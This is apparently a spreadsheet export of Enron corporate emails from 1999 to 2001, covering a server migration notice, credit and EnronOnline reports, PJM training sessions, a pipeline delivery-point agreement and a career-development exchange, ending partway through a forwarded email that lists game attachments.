'f..herod@enron.com', 'george.rivas@enron.com', 'anthony.macdonald@enron.com', 'jaime.gualy@enron.com', 'briant.baker@enron.com', 'chris.luttrell@enron.com', 'geraldine.shore@enron.com', 'isaac.rodriguez@enron.com', 'brian.hendon@enron.com', 'julie.pechersky@enron.com', 'c..kenne@enron.com', 'hal.elrod@enron.com', 'gina.lavallee@enron.com', 'garrett.tripp@enron.com', 'darren.espey@enron.com', 'dale.neuner@enron.com', 'jim.homco@enron.com', 'erin.kanouff@enron.com', 'greg.johnson@enron.com', 'charlie.foster@enron.com', 'jana.morse@enron.com', 'david.hanslip@enron.com', 'alexios.kollaros@enron.com', 'julia.hunter@enron.com', 'david.zaccour@enron.com', 'buddy.majorwitz@enron.com', 'greg.caudell@enron.com', 'jeff.lyons@enron.com', 'nepco.garrett@enron.com', 'john.jacobsen@enron.com', 'eloy.escobar@enron.com', 'jessie.patterson@enron.com', 'albert.luc@enron.com', 'chris.holt@enron.com', 'amanda.martin@enron.com', 'joseph.nieten@enron.com', 'gary.stadler@enron.com', 'beth.vaughan@enron.com', 'aneela.charania@enron.com', 'cam.lehouillier@enron.com', 'a..rice@enron.com', 'bob.mccrory@enron.com', 'chris.unger@enron.com', 'ashley.worthing@enron.com', 'john.paliatsos@enron.com', 'andrea.langfeldt@enron.com', 'brian.spector@enron.com', 'john.hodge@enron.com', 'jarrod.cyprow@enron.com', 'dale.smith@enron.com', 'brian.larkin@enron.com', 'govind.pentakota@enron.com', 'graham.dunbar@enron.com', 'brian.steinbrueck@enron.com', 'heather.kendall@enron.com', 'david.eichinger@enron.com', 'george.grant@enron.com', 'chris.glaas@enron.com', 'darin.talley@enron.com', 'chad.bruce@enron.com', 'anthony.hill@enron.com', 'd..hare@enron.com', 'gloria.solis@enron.com', 'chad.ihrig@enron.com', 'billie.akhave@enron.com', 'alton.jackson@enron.com', 'craig.childers@enron.com', 'beverly.lakes@enron.com', 'christine.pham@enron.com', 'r..conner@enron.com', 'deepak.krishnamurthy@enron.com', 'darrell.teague@enron.com', 'gregory.steagall@enron.com', 'd..hogan@enron.com', 'gordon.savage@enron.com', 'dave.kistler@enron.com', 'darshana.sawant@enron.com', 'jason.biever@enron.com', 'a..fox@enron.com', 'dan.dietrich@enron.com', 'gray.calvert@enron.com', 'john.hayes@enron.com', 'eric.letke@enron.com', 'dianne.seib@enron.com', 'hicham.benjelloun@enron.com', 'jane.saladino@enron.com', 'christa.winfrey@enron.com', 'brad.horn@enron.com', 'doug.nelson@enron.com', 'imran.syed@enron.com', 'jamey.johnston@enron.com', 'anita.luong@enron.com', 'gerald.nemec@enron.com', 'graham.aley@enron.com', 'clayton.rondeau@enron.com', 'cindy.hudler@enron.com', 'david.loosley@enron.com', 'connie.kwan@enron.com', 'debbie.mcallister@enron.com', 'errol.mclaughlin@enron.com', 'andreas.barschkis@enron.com', 'ivan.maltz@enron.com', 'chad.gramlich@enron.com', 'greg.martin@enron.com', 'jabari.martin@enron.com', 'jennifer.nguyen@enron.com', 'clara.carrington@enron.com', 'alex.tartakovski@enron.com', 'elaine.nguyen@enron.com', 'flavia.negrete@enron.com', 'julie.guan@enron.com', 'carlee.gawiuk@enron.com', 'anthony.sexton@enron.com', 'fabian.taylor@enron.com', 'r..guillen@enron.com', 'derek.davies@enron.com', 'javier.espinoza@enron.com', 'bjorn.hagelmann@enron.com', 'alex.fuller@enron.com', 'george.simpson@enron.com', 'elaine.schield@enron.com', 'gurdip.saluja@enron.com', 'aaron.adams@enron.com', 'brandi.wachtendorf@enron.com', 'chad.south@enron.com', 'jason.althaus@enron.com', 'chad.landry@enron.com', 'eric.wetterstroem@enron.com', 'charlene.fricker@enron.com', 'daniel.simmons@enron.com', 'ahmed.haque@enron.com', 'jim.robertson@enron.com', 'david.easterby@enron.com', 'james.batist@enron.com', 'johnson.leo@enron.com', "christine.o'hare@enron.com", 'asif.siddiqi@enron.com', 'brian.potter@enron.com', 'cheryl.dawes@enron.com', 'j..vitrella@enron.com', 'john.disturnal@enron.com', 'r..brackett@enron.com', 'hollis.hendrickson@enron.com', 'chengdi.bao@enron.com', 'g..barkowsky@enron.com', 'gary.mccumber@enron.com', 'edosa.obayagbona@enron.com', 'hugh.connett@enron.com', 'alok.garg@enron.com', 'desrae.nicholson@enron.com', 'guillermo.arana@enron.com', 'craig.story@enron.com', 'gaurav.babbar@enron.com', 'bali.dey@enron.com', 'john.oljar@enron.com', 'aliza.burgess@enron.com', '#28.training@enron.com', 'derek.bailey@enron.com', 'chris.abel@enron.com', 'donald.paddack@enron.com', 'daniel.hyslop@enron.com', 'egm &lt;.sharp@enron.com&gt;', 'allan.ford@enron.com', 'humberto.cubillos-uejbe@enron.com', 'bill.fortney@enron.com', 'xtrain08@enron.com', 'damon.fraylon@enron.com', 'claire.viejou@enron.com', 'alejandra.chavez@enron.com', 'andrea.dahlke@enron.com', 'jason.kaniss@enron.com', 'anand.ramakotti@enron.com', 'homan.amiry@enron.com', 'bhavna.pandya@enron.com', 'john.munoz@enron.com', 'erica.garcia@enron.com', 'andrew.hawthorn@enron.com', 'casey.evans@enron.com', 'ees.cross@enron.com', 'amanda.krcha@enron.com', 'elsie.lew@enron.com', 'alicia.solis@enron.com', 'bill.greenizan@enron.com', 'darrel.watkins@enron.com', 'gary.justice@enron.com', 'jeff.huff@enron.com', 'jean.mrha@enron.com', 'brenda.giddings@enron.com', 'bradley.diebner@enron.com', 'claire.dunnett@enron.com', 'heidi.gerry@enron.com', 'r..barker@enron.com', 'donnie.myers@enron.com', 'brooklyn.couch@enron.com', 'dean.sacerdote@enron.com', 'debra.perlingiere@enron.com', 'jason.fischer@enron.com', 'brad.romine@enron.com', 'amita.gosalia@enron.com', 'chuck.emrich@enron.com', 'georgi.landau@enron.com', 'm..forney@enron.com', 'eric.scott@enron.com', 'angela.saenz@enron.com', 'jatinder.dua@enron.com', 'cassy.moses@enron.com', 'chris.walker@enron.com', 'don.schroeder@enron.com', 'bill.doran@enron.com', 'christopher.funk@enron.com', 'doug.sewell@enron.com', 'jae.cho@enron.com', 'coreen.herring@enron.com', 'biral.raja@enron.com', 'jay.jordan@enron.com', 'fraisy.george@enron.com', 'aaron.berutti@enron.com', 'bruce.rudy@enron.com', 'gautam.gupta@enron.com', 'husnain.mirza@enron.com', 'colin.jackson@enron.com', 'gerald.emesih@enron.com', 'huan-chiew.loh@enron.com', 'chris.figueroa@enron.com', 'carla.nguyen@enron.com', 'john.ballentine@enron.com', 'jay.blaine@enron.com', 'thomas.moore@enron.com', 'jennifer.riley@enron.com', 'gretchen.lotz@enron.com', '#29.training@enron.com', 'john.grass@enron.com', 'david.ricafrente@enron.com', 'ingrid.petri@enron.com', 'bruce.smith@enron.com', 'john.scarborough@enron.com', 'joe.parks@enron.com', 'evan.betzer@enron.com', 'h..nguyen@enron.com', 'bruce.mills@enron.com', 'dustin.collins@enron.com', 'dan.cummings@enron.com', 'douglas.miller@enron.com', 't..muzzy@enron.com', 'honey.daryanani@enron.com', 'daniel.castagnola@enron.com', 'dennis.mcgough@enron.com', 'amit.bartarya@enron.com', 'bryant.frihart@enron.com', 'elizabeth.howley@enron.com', 'diana.scholtes@enron.com', 'jesus.guerra@enron.com', 'craig.oishi@enron.com', 'dat.truong@enron.com', '#25.training@enron.com', 'frank.economou@enron.com', 'm..schmidt@enron.com', 'xtrain01@enron.com', 'brian.wesneske@enron.com', 'bilal.bajwa@enron.com', 'daniel.henson@enron.com'})</t>
  </si>
  <si>
    <t>Solar Migration - Third Notice - Time Change!!!!!</t>
  </si>
  <si>
    <t>_x000D_
	During the weekend of October 6 and 7, 2001 the Enterprise Storage Team will be migrating all production users off the current hardware (Solar) that houses their home and application directories (no production databases are affected, but client software will be) to new hardware.	_x000D_
_x000D_
	This migration requires a total system outage of approximately 6 hours.  The outage will occur Saturday night - beginning at 7:00 PM and will last until Sunday morning at 1:00 AM.  All users will need to be logged off during this time period. _x000D_
	In order to validate the migration, production users need to test access to their home directories and applications on Sunday, October 7, 2001.  If you do you experience any difficulties after the migration with access to home directories or applications, please call the resolution center at 713 853-1411.  The resolution center will notify the appropriate resources._x000D_
_x000D_
	The following attachment is a list of the mount points affected._x000D_
 _x000D_
_x000D_
Bob Ambrocik_x000D_
Enterprise Storage Team_x000D_
EB 3429F_x000D_
x5-4577_x000D_
bob.ambrocik@enron.com</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 09:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'8915473@archwireless.net'})</t>
  </si>
  <si>
    <t>8.41</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 04:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.tawney@enron.com', 'gary.taylor@enron.com'})</t>
  </si>
  <si>
    <t>FYI - Weather Channel Ratings</t>
  </si>
  <si>
    <t>This is an excerpt from an internal Weather Channel (Landmark Communications) _x000D_
newsletter....._x000D_
_x000D_
_x000D_
BLIZZARDS PRODUCE HIGH RATINGS FOR WEATHER CHANNEL, RECORD PAGE VIEWS_x000D_
More people turned to The Weather Channel instead of their local TV_x000D_
affiliates to get news about this week's blizzards in Chicago and Detroit,_x000D_
and nearly 25 million viewers - a record - went to  weather.com to follow_x000D_
the storms._x000D_
           In a survey by Survey USA, 25 percent of TV viewers said they found_x000D_
out about the blizzard from The Weather Channel, compared with 17 percent_x000D_
who watched their local NBC affiliate station, and 12 percent who tuned into_x000D_
a local radio station for news. TWC also was the winner - at 30 percent -_x000D_
with those who said the weather network did the best job of covering the_x000D_
storm. Another 16 percent said their NBC affiliate did the best job, and 13_x000D_
percent said Chicago and Detroit CBS affiliates were tops._x000D_
           A record number of pageviews - 24.6 million - were recorded at_x000D_
weather.com. TWC produced a 6 a.m. to 12 p.m. rating of 0.751 on Monday,_x000D_
delivering an average of 586,000 households. This performance is well over_x000D_
twice the average December monthly rating to date._x000D_
           Kansas City and St. Louis recorded the highest metered market_x000D_
ratings during the blizzard, followed by Detroit. The Chicago rating also_x000D_
was within the top 10.</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 06:37:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'autumn_cartier@eott.com'})</t>
  </si>
  <si>
    <t>RE: Employee Development/Growth</t>
  </si>
  <si>
    <t>First of all congratulations on completing your degree.  Having completed my Masters degree by going to school at nights and Saturdays while working full time I know first hand the commitment that takes.  I suggest that you work through Mary Ellen in trying to find the right position.  She knows Gary Smith, VP of HR for ETS.  Between the two of them they should be able to offer you the right advise.  Keep me informed._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Autumn_Cartier@eott.com@ENRON [mailto:IMCEANOTES-Autumn+5FCartier+40eott+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, June 06, 2001 1:33 PM_x000D_
To:	Horton, Stanley_x000D_
Subject:	Employee Development/Growth_x000D_
_x000D_
Stan,_x000D_
_x000D_
I had the opportunity to participate in the Table Talk session yesterday at_x000D_
EOTT and want to follow up with you on the topic of employee growth and_x000D_
development.  Thanks to EOTT's tuition reimbursement program, I will be_x000D_
completing my undergraduate degree this summer at UST (although I "walked"_x000D_
two weeks ago).  My degree is in General Studies (concentrations in_x000D_
Business Administration and International Studies).  I am graduating Summa_x000D_
Cum Laudeand received the Outstanding Graduate award in my degree program,_x000D_
along with honors in English, Philosophy and Adult Education.  I intend to_x000D_
start the MBA program at UST in Spring 2002._x000D_
_x000D_
I would like to find a position within your organization where I can learn_x000D_
the business, provide value to the company as well as advance myself.  I_x000D_
mention that I am graduating with honors not to pat myself on the back but_x000D_
to impress upon you that I will apply the same focus and desire for_x000D_
excellence in any position I undertake.  Naturally, I would like to stay_x000D_
within the Enron companies not only because I have 7 years invested_x000D_
already, but because Enron is the place to work and grow.  I am open to any_x000D_
position where there is an opportunity for learn, grow and advance.  As_x000D_
with my studies, I find the more I become aware of and learn, the more I_x000D_
want to learn.  I know I could do a great job within an organization given_x000D_
the opportunity._x000D_
_x000D_
Any advice or assistance in finding a position or internship would be_x000D_
greatly appreciated._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Autumn R. Cartier_x000D_
Executive Assistant_x000D_
EOTT Energy Corp._x000D_
2000 W. Sam Houston Pkwy. S., Ste. 400_x000D_
Houston, TX  77042-3611_x000D_
(713) 993-5026 / BLP4453_x000D_
(713) 402-2801 (fax)</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 02:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Credit Report--4/16/01</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip M Love/HOU/ECT on 04/17/2001 _x000D_
09:06 AM ---------------------------_x000D_
From: Darren Vanek/ENRON@enronXgate on 04/17/2001 09:00 AM_x000D_
To: Janie Aguayo/HOU/ECT@ECT, Diane Anderson/NA/Enron@Enron, Derek _x000D_
Bailey/Corp/Enron@ENRON, David Baumbach/HOU/ECT@ECT, Jean Bell/HOU/ECT@ECT, _x000D_
Patricia Boulanger/CAL/ECT@ECT, Bob Bowen/HOU/ECT@ECT, Julie _x000D_
Brewer/NA/Enron@Enron, Lesli Campbell/ENRON@enronXgate, Celeste _x000D_
Cisneros/NA/Enron@Enron, Sharon Crawford/CAL/ECT@ECT, Richard _x000D_
Deming/NA/Enron@Enron, Russell Diamond/ENRON@enronXgate, Cindy _x000D_
Feldman/CAL/ECT@ECT, Darron C Giron/HOU/ECT@ECT, Veronica _x000D_
Gonzalez/ENRON@enronXgate, Jeffrey C Gossett/HOU/ECT@ECT, Walter _x000D_
Guidroz/ENRON@enronXgate, Larry Joe Hunter/HOU/ECT@ECT, Kam _x000D_
Keiser/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Errol _x000D_
McLaughlin/Corp/Enron@ENRON, Nidia Mendoza/ENRON@enronXgate, Tom _x000D_
Moran/ENRON@enronXgate, Bianca Ornelas/NA/Enron@Enron, Leslie _x000D_
Reeves/HOU/ECT@ECT, Tanya Rohauer/ENRON@enronXgate, Dianne Seib/CAL/ECT@ECT, _x000D_
Linda Sietzema/CAL/ECT@ECT, Kim S Theriot/HOU/ECT@ECT, Ellen _x000D_
Wallumrod/NA/Enron@ENRON, Melinda Whalen/CAL/ECT@ECT, Tiffany _x000D_
Williams/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Credit Report--4/16/01_x000D_
_x000D_
Today's credit report_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 03:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Gerald:_x000D_
_x000D_
At your request, I am attaching the Letter of Intent form._x000D_
_x000D_
Jeff</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 08:23:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pjm-customer-info@risc1.pjm.com', 'trainannounce@pjm.com'})</t>
  </si>
  <si>
    <t>PJM Announces Training Sessions for PJM West Changes</t>
  </si>
  <si>
    <t>sent from the pjm-customer-info mailing list at pjm-customer-info@majordomo.pjm.com:_x000D_
_x000D_
PJM Announces two one-day training courses to explain changes for implementation_x000D_
of PJM West which will take place on January 1, 2002._x000D_
_x000D_
The PJM West Expansion Course is a one-day course which will provide information_x000D_
on changes to PJM agreements, the regional transmission planning process,_x000D_
dispatch operations for PJM and PJM West coordination, transmission service,_x000D_
energy market and eSuite business tool,  reliability assurance and capacity_x000D_
markets, ancillary services markets, and market settlements. Target audience:_x000D_
Any existing or new PJM participant. Although a review of the existing PJM model_x000D_
will be provided, it is preferred if participants have an understanding of the_x000D_
PJM energy markets, operations, and reliability assurance._x000D_
_x000D_
*	November 29, 2001 - Desmond Hotel, Malvern, PA_x000D_
*	December 3, 2001 - Hyatt Regency Hotel, Houston, TX_x000D_
*	December 13, 2001 - Hyatt Regency Hotel, Pittsburgh PA Airport_x000D_
*	December 17, 2001 - Desmond Hotel, Malvern, PA_x000D_
_x000D_
The Fundamentals of Available Capacity is a one-day course to explain the_x000D_
capacity obligation process and changes to eCapacity for PJM West. Topics will_x000D_
include the load and obligation process, available capacity resources, available_x000D_
capacity credit market, and all functions of the new version of eCapacity which_x000D_
will handle both the PJM East Unforced Capacity Market and the PJM West_x000D_
Available Capacity Market. Target audience: Load Serving Entities (LSEs),_x000D_
Electric Distribution Companies (EDCs), and Generation Owners who serve load in_x000D_
PJM West or plan to participate in the PJM West Available Capacity Market, as_x000D_
well as all current users of eCapacity._x000D_
*	November 15, 2001 - Hyatt Regency Hotel, Pittsburgh, PA Airport_x000D_
*	December 18, 2001 - Desmond Hotel, Malvern, PA ._x000D_
There is no charge to PJM members. Non-members will be charged $500 for each_x000D_
course._x000D_
Registration forms and  complete descriptions are available on the PJM web site_x000D_
at http://www.pjm.com/training/training_index.html_x000D_
_x000D_
_x000D_
_x000D_
Please DO NOT REPLY to this message. If you have a question for PJM Customer_x000D_
Relations and Training, please complete and submit this form:_x000D_
http://www.pjm.com/contact/questions.html_x000D_
_x000D_
To unsubscribe from this list, send an e-mail to majordomo@majordomo.pjm.com_x000D_
containing only the following line in the body of the e-mail:_x000D_
_x000D_
unsubscribe pjm-customer-info</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 08:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'maureen.mcvicker@enron.com', 'skean@enron.com'})</t>
  </si>
  <si>
    <t>Re: VOICEMAIL RE CALIFORNIA</t>
  </si>
  <si>
    <t>Couple of thoughts:_x000D_
_x000D_
In light of all the events that have transpired yesterday and today, seems _x000D_
that the IOUs have decided to up the ante considerably (likely in response to _x000D_
a pounding they're taking from Wall Street). This will likely increase the _x000D_
pressure for Davis to act sooner rather than later, at least w.r.t. finding a _x000D_
way out of the IOU undercollection problem.   The increased pressure to act _x000D_
in turn increases the likelihood that a bad solution will emerge.   Regarding _x000D_
the call on Monday with Davis, the added heat being applied might argue for _x000D_
coming up with a simple, concrete proposal that we can hand to Davis and that _x000D_
he can implement immediately to get the IOUs off his back and avoid having _x000D_
the adminstration cook up something less preferable.</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 05:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EnronOnline Public Report for October 20, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by David Forster/Corp/Enron on 10/24/2000 _x000D_
12:25 PM ---------------------------_x000D_
_x000D_
_x000D_
Leonardo Pacheco_x000D_
10/23/2000 06:22 PM_x000D_
To: Mark Palmer/Corp/Enron@ENRON, Eric Thode/Corp/Enron@ENRON, Mark _x000D_
Taylor/HOU/ECT@ECT, Jackie Gentle/LON/ECT@ECT, Rob Bradley/Corp/Enron@ENRON, _x000D_
David W Delainey/HOU/ECT@ECT, Mark Koenig/Corp/Enron@ENRON, Steven J _x000D_
Kean/HOU/EES@EES, Philippe A Bibi/HOU/ECT@ECT, George McClellan/HOU/ECT@ECT, _x000D_
Bryan Seyfried/LON/ECT@ECT, Rick Buy/HOU/ECT@ECT, Greg _x000D_
Piper/Corp/Enron@Enron, Fred Lagrasta/HOU/ECT@ECT, Edward D _x000D_
Baughman/HOU/ECT@ECT, Craig Breslau/HOU/ECT@ECT, Michael McDonald/SF/ECT@ECT, _x000D_
Grant Oh/CAL/ECT@ECT, Harold Bertram/HOU/ECT@ECT, Cary M _x000D_
Carrabine/Corp/Enron@Enron, Edward Ondarza/HOU/ECT@ECT, Mark _x000D_
Tawney/HOU/ECT@ECT, Per Sekse/NY/ECT@ECT, Janet R Dietrich/HOU/ECT@ECT, Max _x000D_
Yzaguirre/NA/Enron@ENRON, Greg Wolfe/HOU/ECT@ECT, Brian _x000D_
Bierbach/DEN/ECT@Enron, Brian Redmond/HOU/ECT@ECT, Kathryn _x000D_
Corbally/Corp/Enron@ENRON, Stuart Staley/LON/ECT@ECT, Kevin _x000D_
McGowan/Corp/Enron@ENRON, Peter Bradley/LON/ECT@ECT, Sally Beck/HOU/ECT@ECT, _x000D_
John Ambler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, George _x000D_
Wasaff/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Meredith _x000D_
Philipp/Corp/Enron@ENRON, Karen Denne/Corp/Enron@ENRON, Lisa _x000D_
Lees/HOU/ECT@ECT, Mary Gopalan/LON/ECT@ECT, Kal Shah/HOU/ECT@ECT, Greg _x000D_
Whalley/HOU/ECT@ECT, Daniel Diamond/HOU/ECT@ECT, Michael _x000D_
Danielson/HOU/ECT@ECT, Brenda F Herod/HOU/ECT@ECT, Mark _x000D_
Pickering/LON/ECT@ECT, Don Cornwell/Corp/Enron@Enron, Richard _x000D_
Shapiro/HOU/EES@EES, Stephanie Miller/Corp/Enron@ENRON, Anthony _x000D_
Dayao/HOU/ECT@ECT, Ricardo Lisboa/SA/Enron@Enron, Remi _x000D_
Collonges/SA/Enron@Enron, Katrin Haux/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Suryan Wirya Simunovic/LON/ECT@ECT, Mark Frevert/NA/Enron@Enron, James A _x000D_
Ajello/HOU/ECT@ECT, Ted Seitz/Enron Communications@Enron Communications, Jim _x000D_
Crowder/Enron Communications@Enron Communications, Mitch Olson/Enron _x000D_
Communications@Enron Communications, John McClain/Enron Communications@Enron _x000D_
Communications, Bill Abler/Enron Communications@Enron Communications, Emily _x000D_
Wander/Enron Communications@Enron Communications, Jay Hawthorn/Enron _x000D_
Communications@Enron Communications, Jeff Bartlett/HOU/ECT@ECT, Jonathan _x000D_
Whitehead/AP/Enron@Enron, Alan Engberg/HOU/ECT@ECT, Joseph P _x000D_
Hirl/AP/ENRON@ENRON, Thomas D Gros/NA/Enron@Enron, Iona Maclean/LON/ECT@ECT, _x000D_
Jeff Kinneman/HOU/ECT@ECT, Jez Peters/LON/ECT@ECT, Samuel _x000D_
Grossman/LON/ECT@ECT, Bryan Hull/HOU/ECT@ECT, Allan Sommer/Corp/Enron@Enron, _x000D_
Jeannie Mandelker/HOU/ECT@ECT, Elizabeth Linnell/NA/Enron@Enron, Alhamd _x000D_
Alkhayat/NA/Enron@ENRON, David Oxley/HOU/ECT@ECT, John E _x000D_
Bowman/ENRON@Gateway, Carrie A Robert/NA/Enron@Enron, Steven J _x000D_
Kean/NA/Enron@Enron, Henry Means/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cedric _x000D_
Burgher/Corp/Enron@ENRON, Jason Seigal/LON/ECT@ECT, Andrew _x000D_
Wilson/Corp/Enron@ENRON_x000D_
cc: Louise Kitchen/HOU/ECT@ECT, Bob Shults/HOU/ECT@ECT, Amita _x000D_
Gosalia/LON/ECT@ECT, David Forster/Corp/Enron@Enron, Rahil Jafry/HOU/ECT@ECT, _x000D_
George Hope/HOU/ECT@ECT, Heather Alon/HOU/ECT@ECT, Erica _x000D_
Bess/Corp/Enron@ENRON, Justin Rostant/HOU/ECT@ECT, Tammie _x000D_
Schoppe/HOU/ECT@ECT, Adriane Moratto/NA/Enron@Enron _x000D_
_x000D_
Subject: EnronOnline Public Report for October 20, 2000_x000D_
_x000D_
Please find attached the current copy of the EnronOnline Weekly Public Report _x000D_
and Key Messages, including slides and statistics for public consumption.  _x000D_
The information contained in the attachments can be communicated to audiences _x000D_
outside the company and should be used to ensure that we present a consistent _x000D_
message to the public. Please ensure that this email is distributed to anyone _x000D_
in your group who needs to discuss EnronOnline with individuals outside the _x000D_
company._x000D_
_x000D_
This report is not intended to be used as a stand-alone presentation, nor _x000D_
that all the information be used in a single presentation or customer _x000D_
communication. _x000D_
_x000D_
_x000D_
                 _x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 12:02:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Big Sandy Delivery Point Construction and Operating Agreement -_x000D_
 Revised</t>
  </si>
  <si>
    <t>Kim-_x000D_
I just heard that all is going good with the appeal._x000D_
They are going to be back at it tomorrow afternoon._x000D_
Once appeal has been made, then ACC has until Nov 26th to return approval/no_x000D_
approval._x000D_
Should not take that long, however._x000D_
I will keep you posted._x000D_
Kirk_x000D_
_x000D_
-----Original Message-----_x000D_
From: Watson, Kimberly [mailto:Kimberly.Watson@enron.com]_x000D_
Sent: Thursday, October 25, 2001 1:54 PM_x000D_
To: Ketcherside, Kirk L (IGI Resources)_x000D_
Cc: Matthews, Ron_x000D_
Subject: RE: Big Sandy Delivery Point Construction and Operating_x000D_
Agreement - Revised _x000D_
_x000D_
_x000D_
Kirk, _x000D_
_x000D_
No problem.  We will make ourselves available when you are ready.  We_x000D_
are very interested in your progress with the ACC.  Good luck and keep_x000D_
us posted!  _x000D_
_x000D_
Thanks, Kim._x000D_
_x000D_
-----Original Message-----_x000D_
From: Ketcherside, Kirk L (IGI Resources) [mailto:KetcheKL@bp.com]_x000D_
Sent: Thursday, October 25, 2001 1:09 PM_x000D_
To: Watson, Kimberly_x000D_
Subject: RE: Big Sandy Delivery Point Construction and Operating_x000D_
Agreement - Revised _x000D_
_x000D_
_x000D_
Kim,_x000D_
Thanks so much for your patience._x000D_
I have been busier than busy._x000D_
I do want to talk with you regarding Big Sandy._x000D_
The project is currently in its appeal process with the ACC...hopefully_x000D_
will_x000D_
know yeah/neigh later today or tomorrow._x000D_
I will endeavor to buzz you tomorrow (I am in my Irvine office today,_x000D_
with a_x000D_
full slate of meetings)._x000D_
Regards,_x000D_
Kirk_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Watson, Kimberly [mailto:Kimberly.Watson@enron.com]_x000D_
Sent: Friday, October 12, 2001 6:53 PM_x000D_
To: ketchekl@bp.com_x000D_
Cc: Matthews, Ron_x000D_
Subject: Big Sandy Delivery Point Construction and Operating Agreement -_x000D_
Revised _x000D_
_x000D_
_x000D_
Kirk,_x000D_
_x000D_
As per our phone conversation, here is the revised Delivery Point_x000D_
Construction and Operating Agreement.  Please let me know if you will_x000D_
have some time on Monday or Tuesday when you are in Houston and Ron and_x000D_
I can review this with you.  If we don't connect up in person, then let_x000D_
me know if you would like to book a telephone conference call Wednesday,_x000D_
Thursday or Friday.  _x000D_
_x000D_
Have a nice weekend and safe travel to Houston!_x000D_
_x000D_
Thanks, _x000D_
_x000D_
Kim_x000D_
_x000D_
_x000D_
 &lt;&lt;Big Sandy Del Pt Const and Oper Agreement - Revised 10-12-01.doc&gt;&gt;_x000D_
 &lt;&lt;Big Sandy Exhibit A Cost Estimate - Revised 10-12-01.xls&gt;&gt; _x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_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_x000D_
reply_x000D_
to Enron Corp. at enron.messaging.administration@enron.com and delete_x000D_
all_x000D_
copies of the message. This e-mail (and any attachments hereto) are not_x000D_
intended to be an offer (or an acceptance) and do not create or evidence_x000D_
a_x000D_
binding and enforceable contract between Enron Corp. (or any of its_x000D_
affiliates) and the intended recipient or any other party, and may not_x000D_
be_x000D_
relied on by anyone as the basis of a contract by estoppel or otherwise._x000D_
Thank you. _x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>Fri, 10 Dec 1999 12:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ward_h@houworks.com'})</t>
  </si>
  <si>
    <t>frozenset({'forbes_t.jefferson_po.hw_email@houworks.com', 'zamarippa_r@houworks.com', 'watson_c.jefferson_po.hw_email@houworks.com', 'davisg@itep.org', 'dana.davis@enron.com', 'hill_l.jefferson_po.hw_email@houworks.com', 'taylor_c.jefferson_po.hw_email@houworks.com'})</t>
  </si>
  <si>
    <t>Fwd: FW: HAVE FUN</t>
  </si>
  <si>
    <t>Received: from houhq_svrapp1.oaksgroup.com ([209.220.178.10]) by HW_3; Fri, _x000D_
10 Dec 1999 09:10:12 -0600_x000D_
Received: by HOUHQ_SVRAPP1 with Internet Mail Service (5.5.2448.0) id _x000D_
&lt;XNAYN4BM&gt;; Fri, 10 Dec 1999 09:06:05 -0600_x000D_
Message-ID: &lt;4D91BD0D6220D311905A0008C75B72054C7793@HOUHQ_SVRAPP1&gt;_x000D_
From: Jennifer Bell &lt;jennifer.bell@oaksgroup.com&gt;_x000D_
To: "'Ward_H@houworks.com'" &lt;Ward_H@houworks.com&gt;_x000D_
Subject: FW: HAVE FUN_x000D_
Date: Fri, 10 Dec 1999 09:06:01 -0600_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2448.0)_x000D_
Content-Type: multipart/mixed; _x000D_
boundary="----_=_NextPart_000_01BF4320.1484398C"_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;JACKS2.EXE&gt;&gt;  &lt;&lt;BLOCKS3.EXE&gt;&gt;  &lt;&lt;CHECKERS.EXE&gt;&gt;  &lt;&lt;CODEBRAK.EXE&gt;&gt;_x000D_
&lt;&lt;DOMINOES.EXE&gt;&gt;  &lt;&lt;DOTS.EXE&gt;&gt;  &lt;&lt;FLAGHUNT.EXE&gt;&gt;  &lt;&lt;HANGMAN3.EXE&gt;&gt;_x000D_
&lt;&lt;HYPEROID.EXE&gt;&gt;  &lt;&lt;AFORCE.EXE&gt;&gt;  &lt;&lt;MARIO.EXE&gt;&gt;  &lt;&lt;PACPC.EXE&gt;&gt;  &lt;&lt;POOL.EXE&gt;&gt;_x000D_
 &lt;&lt;SLOT.EXE&gt;&gt;  &lt;&lt;SPADES.EXE&gt;&gt;  &lt;&lt;SQUASH.EXE&gt;&gt;  &lt;&lt;STICKS.EXE&gt;&gt;  &lt;&lt;SOL.EXE&gt;&gt;_x000D_
&lt;&lt;Killbees.exe&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
